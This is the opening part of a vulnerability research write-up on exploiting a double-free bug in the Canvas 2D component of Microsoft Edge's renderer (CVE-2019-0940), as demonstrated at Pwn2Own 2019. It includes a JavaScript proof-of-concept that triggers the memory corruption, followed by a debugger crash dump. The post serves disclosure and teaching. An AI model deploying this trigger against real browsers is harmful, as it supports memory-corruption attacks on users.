Pwn2Own 2019: Microsoft Edge Renderer Exploitation (CVE-2019-0940). Part 1

Pwn2Own 2019: Microsoft Edge Renderer Exploitation (CVE-2019-0940). Part 1

Author: Arthur Gerkis


This year Exodus Intelligence participated in the Pwn2Own competition in Vancouver. The chosen target was the Microsoft Edge browser and a full-chain browser exploit was successfully demonstrated. The exploit consisted of two parts:


renderer double-free vulnerability exploit achieving arbitrary read-write
logical vulnerability sandbox escape exploit achieving arbitrary code execution with Medium Integrity Level

This blog post describes the exploitation of the double-free vulnerability in the renderer process of Microsoft Edge 64-bit. Part 2 will describe the sandbox escape vulnerability.


The Vulnerability


The vulnerability is located in the Canvas 2D API component which is responsible for creating canvas patterns. The crash is triggered with the following JavaScript code:



let canvas = document.createElement('canvas');
let ctx = canvas.getContext('2d'); // Allocate canvas pattern objects and populate hash table.
for (let i = 0; i < 31; i++) { ctx.createPattern(canvas, 'no-repeat');
} // Here the canvas pattern objects will be freed.
gc(); // This is causing internal OOM error.
canvas.setAttribute('height', 0x4000);
canvas.setAttribute('width', 0x4000); // This will partially initialize canvas pattern object and trigger double-free.
try { ctx.createPattern(canvas, 'no-repeat');
} catch (e) { }

If you run this test-case, you may notice that the crash does not happen always, several attempts may be required. In one of the next sections it will be explained why.


With the page heap enabled, the crash would look like this:



(470.122c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
edgehtml!TDispResourceCache::Remove+0x60:
00007ffd`2e5cd820 834708ff add dword ptr [rdi+8],0FFFFFFFFh ds:00000249`2681fff8=????????
0:016> r
rax=000002490563a4a0 rbx=0000000000000000 rcx=0000000000000000
rdx=0000000000000000 rsi=000000798c7fa710 rdi=000002492681fff0
rip=00007ffd2e5cd820 ..